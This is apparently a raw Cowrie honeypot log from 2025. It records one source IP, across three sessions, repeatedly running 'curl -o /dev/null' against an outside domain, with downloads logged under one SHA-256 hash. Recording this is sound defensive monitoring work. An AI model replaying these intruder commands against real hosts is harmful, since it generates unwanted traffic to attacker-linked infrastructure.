{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.207871Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.209511Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.210311Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.213187Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.214052Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.215866Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.216544Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.254049Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.255398Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.255949Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.259449Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.263259Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.265660Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.266493Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.267848Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.268549Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.295676Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.298210Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.301880Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.304806Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.305459Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.308154Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.308944Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.310334Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.311121Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.341712Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.342546Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.345981Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.349151Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.351763Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.353811Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.354714Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.356719Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.357524Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.362886Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.387929Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.388654Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.393429Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.395733Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.397677Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.398628Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.401214Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.402929Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.430424Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.431213Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.435157Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.438183Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.441813Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.442369Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.445647Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.446463Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.451215Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.482302Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.485586Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.487250Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.488081Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.492652Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.493856Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.494760Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.498172Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.499547Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.530736Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.531563Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.536267Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.537903Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.538418Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.540846Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.541489Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.544007Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.547223Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.601514Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.606014Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.608873Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.610537Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.611153Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.613294Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.613839Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.615602Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.616128Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.652304Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
